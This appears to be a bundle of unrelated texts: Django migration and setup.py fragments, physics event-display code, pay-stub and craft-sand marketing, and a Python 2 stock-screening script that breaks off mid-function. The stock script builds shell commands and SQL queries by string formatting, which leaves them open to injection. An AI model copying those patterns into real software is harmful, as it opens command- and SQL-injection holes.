('person', models.ForeignKey(to='contacts.Person', related_name='gifts', verbose_name='Person')),
],
options={
'abstract': False,
},
bases=(ananta.models.NextPrevMixin, models.Model),
),
]
|
Restaurants and Dining Guide for Zip Code 63110 - 42 restaurants found in Zip Code 63110. Find a restaurant in Zip Code 63110 by category, zip code. Make reservations, read and write reviews. If you are a business owner, you can contact us to submit your restaurant and get it listed in our restaurants and dining guide.
|
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='Pantry',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.3',
description='A simple file data store',
long_description=long_description,
# The project's main homepage.
url='https://github.com/kryptn/Pantry',
# Author details
author='David Bibb',
author_email='david@dbibb.com',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
# What does your project relate to?
keywords='simple database datastore data store',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
#install_requires=['peppercorn'],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
#extras_require={
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
#},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
#package_data={
# 'sample': ['package_data.dat'],
#},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
#entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
#},
)
|
The simplicity of internet-based pay stub creators is evident, yet, these still do a great job relative to mainstream payroll applications in aspects like working out critical staff/pay information. As you start using the web-based system, a form with fields is given where you may supply employer details such as company name, email address, and state.
All employee information is captured too. Essentially, the application captures and calculates all monthly payments made on a worker’s behalf, including union deductions, insurance dues, and income tax. As a result, an employee has a slip with precise details of what their next end month payment will be like. The Intricacies and Costs of On-Premise Software are Avoided Your small company may leverage conventional payroll app functionalities via various approaches, yet, these may not prove viable. For example, you may buy licensed software which you may be paying for every year, piling more costs on your small budget. Outsourcing payroll services to the cloud is also an added expense. Additionally, the financial muscle to create and maintain software of your own may be lacking. That won’t be an issue for you when you’re utilizing a pay stub creator on the web. All expenditure emanating from producing the pay stubs on websites is small, meaning smaller operating spending for your small business. Quick Access and Generation Nowadays, pay stub creators can deliver the paperwork quickly, and your employees can find them as soon as need be. As such, transparency at the office is enhanced since lack of timely delivery of the docs can instill nervousness and mistrust among employees. Also, if a worker raises a complaint, the stub can be checked without a lot of fuss. More Convenient Than Manual Paperwork If you’re currently using manual calculations, it’s high time you switched to a more convenient approach. A reliable online check stub template gets rid of the cumbersome manual math you’ve been utilizing for your ‘payroll computations.’ The app eliminates errors from pay calculations, and it facilitates any desired tracking of past records. Your small business can benefit immensely from using an online pay stub generator. The generators help reduce operational costs and improve accuracy, access, and timeliness of pay stub production.
|
import ROOT as r
import supy
class displayer(supy.steps.displayer):
def __init__(self,
scale=200.0,
jets=[{"fixes":("J", "Gen"), "nMax":4, "color":r.kBlack, "width":2, "style":2},
{"fixes":("J", ""), "nMax":4, "color":r.kBlue, "width":1, "style":1},
],
nMaxParticles=4,
particles=[("genB", r.kRed, 0.15),
("genTau", r.kCyan, 0.15),
("genMu", r.kMagenta+1, 0.05),
("genEle", r.kOrange, 0.05),
],
nMaxDiTaus=4,
taus={"color":r.kGreen+2, "width":1, "style":1},
):
self.moreName = "(see below)"
for item in ["scale", "jets", "nMaxParticles", "particles", "nMaxDiTaus", "taus"]:
setattr(self, item, eval(item))
self.titleSizeFactor = 1.0
self.legendDict = {}
self.legendList = []
self.ellipse = r.TEllipse()
self.ellipse.SetFillStyle(0)
self.line = r.TLine()
self.arrow = r.TArrow()
self.text = r.TText()
self.latex = r.TLatex()
def prepareText(self, params, coords) :
self.text.SetTextSize(params["size"])
self.text.SetTextFont(params["font"])
self.text.SetTextColor(params["color"])
self.textSlope = params["slope"]
self.textX = coords["x"]
self.textY = coords["y"]
self.textCounter = 0
def printText(self, message, color=r.kBlack):
self.text.SetTextColor(color)
self.text.DrawText(self.textX, self.textY - self.textCounter * self.textSlope, message)
self.textCounter += 1
self.text.SetTextColor(r.kBlack)
def printEvent(self, eventVars, params, coords):
self.prepareText(params, coords)
self.printText("Event %10d" % eventVars["EVENT"])
self.printText("Weight %9.2f" % eventVars["weight"])
self.printText("")
#self.printText("rho %10.1f" % eventVars["rho"])
self.printText("")
#met = eventVars["MissingET"][0]
#self.printText("MET %10.1f (phi %4.1f)" % (met.MET, met.Phi))
self.printText("")
def printJets(self, eventVars=None, params=None, coords=None, fixes=None, nMax=None, highlight=False):
def j(s="", iJet=None):
return eventVars["%s%d%s%s" % (fixes[0], 1+iJet, fixes[1], s)]
self.prepareText(params, coords)
self.printText("".join(fixes))
headers = " csv pT eta phi mass"
self.printText(headers)
self.printText("-" * len(headers))
for iJet in range(nMax):
if nMax <= iJet:
self.printText("[%d more not listed]" % (nJets - nMax))
break
out = ""
out += "%6s %5.0f %5.1f %5.1f %5.0f" % (" " if fixes[1] else "%6.2f" % j("CSVbtag", iJet),
j("Pt", iJet),
j("Eta", iJet),
j("Phi", iJet),
j("Mass", iJet),
)
self.printText(out, r.kBlack)
def printGenParticles(self, eventVars=None, params=None, coords=None,
nMax=None, particles=None, color=r.kBlack):
def g(s="", iJet=None):
return eventVars["%s%s" % (particles, s)].at(iJet)
self.prepareText(params, coords)
self.printText(particles)
headers = " pT eta phi mass"
self.printText(headers)
self.printText("-" * len(headers))
nParticles = eventVars["%sPt" % particles].size()
for iParticle in range(nParticles):
if nMax <= iParticle:
self.printText("[%d more not listed]" % (nParticles - nMax))
break
self.printText("%5.0f %5.1f %5.1f %5.1f" % (g("Pt", iParticle),
g("Eta", iParticle),
g("Phi", iParticle),
g("Mass", iParticle),
),
color=color)
return
def printDiTaus(self, eventVars=None, params=None, coords=None,
nMax=None, color=r.kBlack, ptMin=None):
self.prepareText(params, coords)
self.printText("di-taus")
headers = "cmee pT eta phi mass iso*"
self.printText(headers)
self.printText("-" * len(headers))
nDiTaus = eventVars["pt1"].size()
for iDiTau in range(nDiTaus):
if nMax <= iDiTau:
self.printText("[%d more not listed]" % (nDiTaus - nMax))
break
for iTau in [1, 2]:
c = eventVars["charge%d" % iTau].at(iDiTau)
if c > 0:
s = "+"
elif c < 0:
s = "-"
else:
s = "@"
values = (s,
eventVars["againstMuonLoose%d" % iTau].at(iDiTau),
eventVars["againstElectronLoose%d" % iTau].at(iDiTau),
eventVars["againstElectronLooseMVA3_%d" % iTau].at(iDiTau),
eventVars["pt%d" % iTau].at(iDiTau),
eventVars["eta%d" % iTau].at(iDiTau),
eventVars["phi%d" % iTau].at(iDiTau),
eventVars["m%d" % iTau].at(iDiTau),
eventVars["iso%d" % iTau].at(iDiTau),
)
self.printText("%1s%1d%1d%1d %5.0f %5.1f %5.1f %5.1f %5.1f" % values, color=color)
self.printText(" ")
return
def drawSkeleton(self, coords, color) :
r.gPad.AbsCoordinates(False)
self.ellipse.SetLineColor(color)
self.ellipse.SetLineWidth(1)
self.ellipse.SetLineStyle(1)
self.ellipse.DrawEllipse(coords["x0"], coords["y0"], coords["radius"], coords["radius"], 0.0, 360.0, 0.0, "")
self.line.SetLineColor(color)
self.line.DrawLine(coords["x0"]-coords["radius"], coords["y0"] , coords["x0"]+coords["radius"], coords["y0"] )
self.line.DrawLine(coords["x0"] , coords["y0"]-coords["radius"], coords["x0"] , coords["y0"]+coords["radius"])
def drawScale(self, color, size, scale, point) :
self.latex.SetTextSize(size)
self.latex.SetTextColor(color)
self.latex.DrawLatex(point["x"], point["y"],"radius = "+str(scale)+" GeV p_{T}")
def drawP4(self,
rhoPhiPad=None,
etaPhiPad=None,
coords=None,
p4=None,
lineColor=None,
lineWidth=1,
lineStyle=1,
arrowSize=1.0,
circleRadius=1.0,
b=None,
tau=None):
c = coords
x0 = c["x0"]
y0 = c["y0"]
x1 = x0 + p4.px()*c["radius"]/c["scale"]
y1 = y0 + p4.py()*c["radius"]/c["scale"]
rhoPhiPad.cd()
self.arrow.SetLineColor(lineColor)
self.arrow.SetLineWidth(lineWidth)
self.arrow.SetLineStyle(lineStyle)
self.arrow.SetArrowSize(arrowSize)
self.arrow.SetFillColor(lineColor)
self.arrow.DrawArrow(x0, y0, x1, y1)
etaPhiPad.cd()
self.ellipse.SetLineColor(lineColor)
self.ellipse.SetLineWidth(lineWidth)
self.ellipse.SetLineStyle(lineStyle)
self.ellipse.DrawEllipse(p4.eta(), p4.phi(), circleRadius, circleRadius, 0.0, 360.0, 0.0, "")
if b:
self.ellipse.SetLineColor(r.kRed)
self.ellipse.SetLineStyle(3)
self.ellipse.DrawEllipse(p4.eta(), p4.phi(), circleRadius, circleRadius, 0.0, 360.0, 0.0, "")
if tau:
self.ellipse.SetLineColor(r.kCyan)
self.ellipse.SetLineStyle(2)
self.ellipse.DrawEllipse(p4.eta(), p4.phi(), circleRadius, circleRadius, 0.0, 360.0, 0.0, "")
def legendFunc(self, lineColor=None, lineStyle=1, name="", desc=""):
if name not in self.legendDict:
self.legendDict[name] = True
self.legendList.append((lineColor, lineStyle, desc, "l"))
def drawGenParticles(self, eventVars=None, indices="",
coords=None, lineColor=None,
lineWidth=1, lineStyle=1,
arrowSize=-1.0, circleRadius=None):
self.legendFunc(lineColor=lineColor,
lineStyle=lineStyle,
name=indices,
desc=indices)
for iParticle in eventVars[indices]:
particle = eventVars["genP4"].at(iParticle)
if circleRadius is None:
self.drawP4(coords=coords,
p4=particle,
lineColor=lineColor,
lineWidth=lineWidth,
arrowSize=arrowSize)
else :
self.drawCircle(p4=particle,
lineColor=lineColor,
lineWidth=lineWidth,
circleRadius=circleRadius)
def drawJets(self, eventVars=None, fixes=None, nMax=None, vec=False, bVar="",
coords=None, lineColor=None, lineWidth=1, lineStyle=1,
arrowSize=-1.0, circleRadius=None, rhoPhiPad=None, etaPhiPad=None):
def j(s="", iJet=None):
if vec:
return eventVars["%s%s" % (fixes[0], s)].at(iJet)
else:
return eventVars["%s%d%s%s" % (fixes[0], 1+iJet, fixes[1], s)]
self.legendFunc(lineColor=lineColor,
lineStyle=lineStyle,
name="".join(fixes), desc="".join(fixes))
for iJet in range(nMax):
if not j("Pt", iJet):
continue
self.drawP4(rhoPhiPad=rhoPhiPad,
etaPhiPad=etaPhiPad,
coords=coords,
p4=supy.utils.LorentzV(j("Pt", iJet), j("Eta", iJet), j("Phi", iJet), j("Mass", iJet)),
b=False if (fixes[1] or not bVar) else (j(bVar, iJet) > 0.679),
tau=False,
lineColor=lineColor,
lineWidth=lineWidth,
lineStyle=lineStyle,
arrowSize=arrowSize,
circleRadius=circleRadius)
def drawTaus(self, eventVars=None,
coords=None, lineColor=None, lineWidth=1, lineStyle=1,
arrowSize=-1.0, circleRadius=None, rhoPhiPad=None, etaPhiPad=None):
self.legendFunc(lineColor=lineColor, lineStyle=lineStyle, name="reco. taus", desc="reco. taus")
nDiTaus = eventVars["pt1"].size()
for iDiTau in range(nDiTaus):
for iTau in [1, 2]:
self.drawP4(rhoPhiPad=rhoPhiPad,
etaPhiPad=etaPhiPad,
coords=coords,
p4=supy.utils.LorentzV(eventVars["pt%d" % iTau].at(iDiTau),
eventVars["eta%d" % iTau].at(iDiTau),
eventVars["phi%d" % iTau].at(iDiTau),
eventVars["m%d" % iTau].at(iDiTau),
),
lineColor=lineColor,
lineWidth=lineWidth,
lineStyle=lineStyle,
arrowSize=arrowSize,
circleRadius=circleRadius)
def etaPhiPad(self, eventVars, corners):
pad = r.TPad("etaPhiPad", "etaPhiPad",
corners["x1"], corners["y1"],
corners["x2"], corners["y2"])
pad.cd()
pad.SetTickx()
pad.SetTicky()
etaPhiPlot = r.TH2D("etaPhi", ";#eta;#phi;",
1, -r.TMath.Pi(), r.TMath.Pi(),
1, -r.TMath.Pi(), r.TMath.Pi())
etaPhiPlot.SetStats(False)
etaPhiPlot.Draw()
return pad, etaPhiPlot
def rhoPhiPad(self, eventVars, coords, corners):
pad = r.TPad("rhoPhiPad", "rhoPhiPad", corners["x1"], corners["y1"], corners["x2"], corners["y2"])
pad.cd()
skeletonColor = r.kYellow+1
self.drawSkeleton(coords, skeletonColor)
self.drawScale(color=skeletonColor, size=0.03, scale=coords["scale"],
point={"x":0.0, "y":coords["radius"]+coords["y0"]+0.03})
return pad
def drawObjects(self, eventVars=None, etaPhiPad=None, rhoPhiPad=None, rhoPhiCoords=None):
defArrowSize=0.5*self.arrow.GetDefaultArrowSize()
defWidth=1
arrowSize = defArrowSize
for particles, color, size in self.particles:
self.drawJets(eventVars=eventVars,
fixes=(particles, ""),
vec=True,
nMax=eventVars["%sPt" % particles].size(),
coords=rhoPhiCoords,
lineColor=color,
arrowSize=arrowSize,
circleRadius=size,
rhoPhiPad=rhoPhiPad,
etaPhiPad=etaPhiPad,
)
arrowSize *= 0.8
for d in self.jets:
self.drawJets(eventVars=eventVars,
fixes=d["fixes"],
nMax=d["nMax"],
bVar="CSVbtag",
coords=rhoPhiCoords,
lineColor=d["color"],
lineWidth=d["width"],
lineStyle=d["style"],
arrowSize=arrowSize,
circleRadius=0.5,
rhoPhiPad=rhoPhiPad,
etaPhiPad=etaPhiPad,
)
arrowSize *= 0.8
self.drawTaus(eventVars=eventVars,
coords=rhoPhiCoords,
lineColor=self.taus["color"],
lineWidth=self.taus["width"],
lineStyle=self.taus["style"],
arrowSize=arrowSize,
circleRadius=0.25,
rhoPhiPad=rhoPhiPad,
etaPhiPad=etaPhiPad,
)
arrowSize *= 0.8
def drawLegend(self, corners) :
pad = r.TPad("legendPad", "legendPad", corners["x1"], corners["y1"], corners["x2"], corners["y2"])
pad.cd()
legend = r.TLegend(0.0, 0.0, 1.0, 1.0)
for color, style, desc, gopts in self.legendList:
self.line.SetLineColor(color)
self.line.SetLineStyle(style)
someLine = self.line.DrawLine(0.0, 0.0, 0.0, 0.0)
legend.AddEntry(someLine, desc, gopts)
legend.Draw("same")
self.canvas.cd()
pad.Draw()
return [pad,legend]
def printText1(self, eventVars, corners):
pad = r.TPad("textPad", "textPad",
corners["x1"], corners["y1"],
corners["x2"], corners["y2"])
pad.cd()
defaults = {}
defaults["size"] = 0.035
defaults["font"] = 80
defaults["color"] = r.kBlack
defaults["slope"] = 0.017
s = defaults["slope"]
smaller = {}
smaller.update(defaults)
smaller["size"] = 0.034
yy = 0.98
x0 = 0.01
self.printEvent(eventVars, params=defaults, coords={"x": x0, "y": yy})
y = yy - 5*s
for d in self.jets:
self.printJets(eventVars,
params=smaller,
coords={"x": x0, "y": y},
fixes=d["fixes"],
nMax=d["nMax"],
highlight=False)
y -= s*(5 + d["nMax"])
for i, (particles, color, size) in enumerate(self.particles):
self.printGenParticles(eventVars,
params=smaller,
particles=particles,
color=color,
coords={"x": x0+(0.5 if i%2 else 0.0), "y": y},
nMax=self.nMaxParticles)
if i % 2:
y -= s*(5 + self.nMaxParticles)
if not (i % 2):
y -= s*(5 + self.nMaxParticles)
self.printDiTaus(eventVars,
params=smaller,
coords={"x": x0, "y": y},
nMax=self.nMaxDiTaus)
y -= s*(5 + self.nMaxDiTaus)
self.canvas.cd()
pad.Draw()
return [pad]
def printText2(self, eventVars, corners):
pad = r.TPad("textPad2", "textPad2",
corners["x1"], corners["y1"],
corners["x2"], corners["y2"])
pad.cd()
defaults = {}
defaults["size"] = 0.08
defaults["font"] = 80
defaults["color"] = r.kBlack
defaults["slope"] = 0.03
s = defaults["slope"]
y = 0.98 - 2*s
x0 = 0.01
self.canvas.cd()
pad.Draw()
return [pad]
def display(self, eventVars):
rhoPhiPadYSize = 0.50*self.canvas.GetAspectRatio()
rhoPhiPadXSize = 0.50
radius = 0.4
rhoPhiCoords = {"scale":self.scale, "radius":radius,
"x0":radius, "y0":radius+0.05}
rhoPhiCorners = {"x1":0.0,
"y1":0.0,
"x2":rhoPhiPadXSize,
"y2":rhoPhiPadYSize}
etaPhiCorners = {"x1":rhoPhiPadXSize - 0.18,
"y1":rhoPhiPadYSize - 0.08*self.canvas.GetAspectRatio(),
"x2":rhoPhiPadXSize + 0.12,
"y2":rhoPhiPadYSize + 0.22*self.canvas.GetAspectRatio()}
legendCorners = {"x1":0.0,
"y1":rhoPhiPadYSize,
"x2":1.0-rhoPhiPadYSize,
"y2":1.0}
textCorners1 = {"x1":rhoPhiPadXSize + 0.11,
"y1":0.0,
"x2":1.0,
"y2":1.0}
textCorners2 = {"x1":rhoPhiPadXSize - 0.08,
"y1":0.0,
"x2":rhoPhiPadXSize + 0.11,
"y2":0.55}
rhoPhiPad = self.rhoPhiPad(eventVars, rhoPhiCoords, rhoPhiCorners)
etaPhiPad, etaPhiPlot = self.etaPhiPad(eventVars, etaPhiCorners)
keep = [rhoPhiPad, etaPhiPad, etaPhiPlot]
self.drawObjects(eventVars, etaPhiPad, rhoPhiPad, rhoPhiCoords)
self.canvas.cd()
rhoPhiPad.Draw()
etaPhiPad.Draw()
keep.append(self.drawLegend(corners=legendCorners))
keep.append(self.printText1(eventVars, corners=textCorners1))
#keep.append(self.printText2(eventVars, corners=textCorners2))
return keep
|
Back 2 School! Head back with a Sparkly Tumbler filled with Crayola Play Sand!
Yes, yes, we know! The time has come already! It's already time to go back to school! Seems like the Summer break just started right?! Send your kiddos back to school in style with their very own custom sparkly tumbler made with Crayola Play Sand! Your kids will love staying hydrated with their colorful tumbler filled with sparkling glitter. The glitter floats around even more when shaken. This adds an amazing effect for kids that need a little sensory interaction while sitting at their desks for long periods of time.
Keep reading to learn how to make one of your own!
Optional: plastic school related inserts (found in scrapbooking at the craft store).
2. Once the sand is filled up 1/2 to 2/3rds of the way, add glitter to your liking for a little extra sparkle! Next, add water to fill up the remaining space until theres only 1-1.5 inches of unfilled space left in the tumbler.
3. Next, its time to glue the bottom lid back down. Grab your E6000 glue, and with a cotton swab, smear a safe amount of glue along the entire inner rim of the tumbler lid. For added sealing, you can also add some glue around the bottom rim of the tumbler as well. Next, quickly screw the lid back on. Make sure it is screwed as tightly and evenly as possible to avoid any chances of water leaking. Allow to dry over night before using.
4. Shake! Shake! Shake! Enjoy watching the sand and glitter mix and float all around. Your kid is going to love it!
5. Optional: DRY version of this tumbler using plastic school-related inserts (found in the scrapbooking section of your craft store). This looks looks pretty messy, but some kids enjoy shaking the tumbler to reveal the pencils and journals buried in the sand! (We do not recommend adding water or liquids if you go this route).
And you're all done! Here's to a bright and colorful school year for the kids in your life!
Make 4th of July Confetti Blasters with Crayola Play Sand!
Independence Day is right around the corner and we've got a fun, colorful and low cost way to celebrate! These blasters make for a wonderful alternative when fireworks in neighborhoods aren't permitted. They are also kid safe, (just be sure to not aim at anyone's face!).
See it in action below and keep reading to learn how to make some of your own!
1. Measure and cut your scrapbook paper to the length of the toilet paper tube. Next, secure the paper to the tube with regular tape as pictured and roll it up until the tube is completely covered. Secure it with more regular tape.
2. Next, cover the clear tape with washi tape. Secure the washi by folding it over on the top and bottom of the tube.
3. Grab a balloon, tie the tail end in a knot and cut the top (round part) off with scicorrs. 1/3 of the way will do!
4. Affix the tail-end of your ballon around the top of the decorated tube and secure the perimeter with washi tape.
All done with the tubes! Now on the sand + confetti mix!
6. Add confetti of your choice...in the amount to your liking. We chose big sparkly stars!
7. Stir up the mix with a spoon until the confetti is spread evenly among the play sand.
8. Spoon in about 2 spoonfuls (2 tbs) of confetti sand mix into each tube.
And you're done! Go outside and blast off! Happy Independence Day!
Prehistoric Safari Sandbox, a place where imagination meets adventure.
How about creating an interactive sandbox game as part of a sand arts and craft activity?
don’t forget the safari hats for your kiddos.
Jump into Summer Colorfully & Safely!
Finally, the summer is here and we all know it’s time to open the doors and let the kids run riot outdoors. Bright, colorful, safe Crayola Play Sand lets children take their creative experiences outdoors. But how safe is Crayola Play Sand? Crayola brand has been a well-trusted brand for many years and all our play sand products are independently tested at Duke University & BioScience Laboratories. Unlike beach sand, the smooth grains are thoroughly washed and dried to remove all contaminants and dirt. And be assured that absolutely no chemicals were used in washing our sand, only water!!! To further ensure you that our Play Sand is safe, each grain is dried by heating them to 250°F which destroys any possible fungal or bio-material.
Let your summer be colorful and most importantly safe!
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__version__ = 0.1
from lib import stock
from lib.htmltmpl import TemplateManager, TemplateProcessor
import sys
import os
import shutil
import pickle
import re
import time
#import pysqlite2.dbapi2 as sqlite
import sqlite3 as sqlite
import getopt
from operator import itemgetter
from decimal import *
import urllib
import json
import fpformat
import subprocess
import datetime
import string
import pprint
import commands
import smtplib
from pprint import pprint
"""
股票均线相对大盘均线的涨幅比较
针对大盘指数涨跌幅对比
"""
import threading,Queue
class ind_runs(threading.Thread):
def __init__(self,base,long_result,short_result,day_ago,sma_day,timeframe='day'):
threading.Thread.__init__(self)
self.long_result=long_result
self.short_result=short_result
self.base=base
self.day_ago= day_ago
self.sma_day=sma_day
self.timeframe = timeframe # week,day,month
def run(self):
"""
强弱度=(该股涨跌幅-指数涨跌幅)*100
"""
while clientpool.empty() != True:
try:
symbol = clientpool.get(block=0)
change = get_indicator_output(symbol,self.day_ago,self.sma_day,self.timeframe)
if change >= self.base:
tmp_str = "%s,%s" % (symbol,change)
data = tuple(tmp_str.split(","))
self.long_result.append(data)
if change <= self.base:
tmp_str = "%s,%s" % (symbol,change)
data = tuple(tmp_str.split(","))
self.short_result.append(data)
except Queue.Empty:
pass
class graph_runs(threading.Thread):
def __init__(self,result,endday,conf_dir):
threading.Thread.__init__(self)
self.result=result
self.endday = endday
self.conf_dir = conf_dir
def run(self):
while clientpool.empty() != True:
try:
symbol = clientpool.get(block=0)
out_dir = img_out_dir
conf_dir = self.conf_dir
graph_conf = "%s/graph_day.conf" % (conf_dir)
graph_week_conf = "%s/graph_week.conf" % (conf_dir)
graph_month_conf = "%s/graph_month.conf" % (conf_dir)
img_file = "%s/%s.png" % (out_dir,symbol)
img_week_file = "%s/%s_WEEK.png" % (out_dir,symbol)
img_month_file = "%s/%s_MONTH.png" % (out_dir,symbol)
os.chdir('%s' % script_dir)
cmd = "perl graphic.pl --end '%s' --file %s --out '%s' %s" % (self.endday,graph_conf,img_file,symbol)
(status,output) = commands.getstatusoutput(cmd)
if status != 0 :
print "Error = %s" % output
continue
cmd = "perl graphic.pl --file %s --out '%s' %s" % (graph_week_conf,img_week_file,symbol)
(status,output) = commands.getstatusoutput(cmd)
if status != 0:
print "Error = %s" % output
continue
cmd = "perl graphic.pl --file %s --out '%s' %s" % (graph_month_conf,img_month_file,symbol)
(status,output) = commands.getstatusoutput(cmd)
if status != 0:
print "Error = %s" % output
continue
stock_dict= {}
stock_dict['symbol'] = symbol
stock_dict['img'] = img_file
stock_dict['img_week'] = img_week_file
stock_dict['img_month'] = img_month_file
self.result.append(stock_dict)
except Queue.Empty:
pass
def get_home_path():
"""
得到用户主目录
"""
homedir = os.environ.get('HOME')
if homedir:
return homedir
else:
homedir = "%s%s" % (os.environ.get('HOMEDRIVE'),os.environ.get('HOMEPATH'))
return homedir
def connect_db(db_file):
"""
股票列表数据库
"""
if os.path.isfile(db_file):
cx = sqlite.connect(db_file)
cu = cx.cursor()
return (cu,cx)
else:
cx = sqlite.connect(db_file)
cu = cx.cursor()
cu.execute('''
create table stock(
id integer primary key,
exchange_name varchar(20),
stock_title varchar(50),
stock_symbol varchar(20) UNIQUE,
stock_country varchar(100),
stock_tradedb_lastupdate_time NUMERIC DEFAULT 0
)''')
return (cu,cx)
def connect_pool_db(db_file):
"""
筛选出的票池列表
"""
if os.path.isfile(db_file):
cx = sqlite.connect(db_file)
cu = cx.cursor()
return (cu,cx)
else:
cx = sqlite.connect(db_file)
cu = cx.cursor()
cu.execute('''
create table stock(
id integer primary key,
symbol varchar(20) UNIQUE,
country varchar(100),
firstsee_time NUMERIC DEFAULT 0,
lastupdate_time NUMERIC DEFAULT 0
)''')
return (cu,cx)
def calc_stock(stock_list,country,timeframe='day'):
"""
计算rps
"""
graph_dir = script_dir
long_data = []
short_data = []
if len(stock_list) == 0 : return result_data
# 标普500指数作为基准
index_name = base_index[country][0]
index_symbol = base_index[country][1]
#day_ago = 30
#sma_day = 120
base_line_percent = get_indicator_output(index_symbol,day_ago,sma_day,timeframe)
if DEBUG: print "day_ago = %s , sma_day = %s ,timeframe=%s , base_line =%s " % (day_ago,sma_day,timeframe,base_line_percent)
#stock_list.append(index_symbol)
quene_list = []
ts = []
# 多线程运行
global clientpool
clientpool = Queue.Queue(0)
for a in stock_list:
a=a.strip()
clientpool.put(a)
for b in xrange(20):
t = ind_runs(base_line_percent,long_data,short_data,day_ago,sma_day,timeframe)
t.start()
ts.append(t)
for t in ts:
if t:t.join()
return (long_data,short_data)
def create_graph(stock_list,template_file,conf_dir,stock_region='US',signal_file="signal_file",endday='today'):
"""
根据股票代码生成图片
"""
out_dir = img_out_dir
graph_conf = "%s/graph_day.conf" % (conf_dir)
template_graph_conf = "/tmp/graph_%s.conf" % (signal_file)
graph_week_conf = "%s/graph_week.conf" % (conf_dir)
graph_month_conf = "%s/graph_month.conf" % (conf_dir)
stock_count = len(stock_list)
template = TemplateManager().prepare(template_file)
tproc = TemplateProcessor(html_escape=0)
stock = []
for symbol in stock_list:
img_file = "%s/%s.png" % (out_dir,symbol)
img_week_file = "%s/%s_WEEK.png" % (out_dir,symbol)
img_month_file = "%s/%s_MONTH.png" % (out_dir,symbol)
stock_dict= {}
stock_dict['symbol'] = symbol
stock_dict['img'] = img_file
stock_dict['img_week'] = img_week_file
stock_dict['img_month'] = img_month_file
stock.append(stock_dict)
#pprint.pprint(stock)
tproc.set("market_name","%s Market" % stock_region)
tproc.set("stock_count",stock_count)
tproc.set("Stock",stock)
# save to file
filename = "%s/%s_%s_STOCK.html" % (out_dir,stock_region,signal_file)
FILE = open(filename,"w")
FILE.writelines(tproc.process(template))
FILE.close()
# 多线程运行
global clientpool
#globals()['clentpool'] = Queue.Queue(0)
clientpool = Queue.Queue(0)
ts = []
for a in stock_list:
a=a.strip()
clientpool.put(a)
for b in xrange(20):
t = graph_runs(stock,endday,conf_dir)
t.start()
ts.append(t)
for t in ts:
if t:t.join()
def export_stock_symbol(db_cursor,cx):
"""
导出股票代码名称对应列表
"""
sql = "select * from stock order by stock_symbol"
#print "DEBUG sql = %s" % sql
db_cursor.execute(sql)
rs = db_cursor.fetchall()
# print title
if len(rs) == 0 : return
sharenames = "/home/hua.fu/.gt/sharenames"
os.system("rm -fr %s" % sharenames)
share_FILE = open(sharenames,"w")
for item in rs:
title = item[2]
symbol = item[3]
country = item[4]
if title:
stock_map = symbol + "\t" + title
share_FILE.writelines(stock_map + "\n")
else:
stock_map = symbol + "\t" + "No title"
share_FILE.writelines(stock_map + "\n")
share_FILE.close()
def get_stock_list(db_cursor,cx,stock_region='US'):
"""
将符合条件的股票列表导出
"""
sql =""
time_now = int(time.time())
sql = "select * from stock where stock_tradedb_lastupdate_time <= %s and stock_country = '%s' order by stock_symbol" % (time_now,stock_region)
#sql = "select * from stock where stock_tradedb_lastupdate_time <= %s and stock_country = '%s' ORDER BY RANDOM() limit 10" % (time_now,stock_region)
db_cursor.execute(sql)
rs = db_cursor.fetchall()
if len(rs) == 0 : return
stock_list = []
for item in rs:
symbol = item[3]
stock_list.append(symbol)
return stock_list
def connect_trade_db(symbol):
"""
连接历史交易数据库
"""
cache_dir = "%s/trade_db" % (base_dir)
symbol = symbol.upper()
db_file = "%s/%s" % (cache_dir,symbol)
if os.path.isfile(db_file) and os.path.getsize(db_file) != 0:
cx = sqlite.connect(db_file)
cu = cx.cursor()
cx.text_factory=str
return (cu,cx)
else:
print "Symbol = %s ,Not find trade data,please check" % symbol
return (False,False)
def sort_stock(stock_data):
""" 排序 """
top_data = {}
s_data = {}
stock_list = []
pool_data = []
# 所有票子的排序
if action == "long":
sorted_list = sorted(stock_data, key=lambda result: Decimal(result[1]),reverse=True)
if action == "short":
sorted_list = sorted(stock_data, key=lambda result: Decimal(result[1]))
for item in sorted_list:
symbol = item[0]
stock_percent = item[1]
stock_list.append(symbol)
tmp_str = "%s,%s" % (symbol,stock_percent)
tmp_data = tuple(tmp_str.split(","))
pool_data.append(tmp_data)
return (stock_list,pool_data)
def get_indicator_output(symbol,dayago=65,sma=50,timeframe='day'):
"""
"""
symbol = symbol.upper()
##if DEBUG: print "DEBUG : CURRENT pROCESS SYMBOL=%s" % symbol
#print "DEBUG : CURRENT pROCESS SYMBOL=%s" % symbol
os.chdir('%s' % script_dir)
if timeframe == 'day':
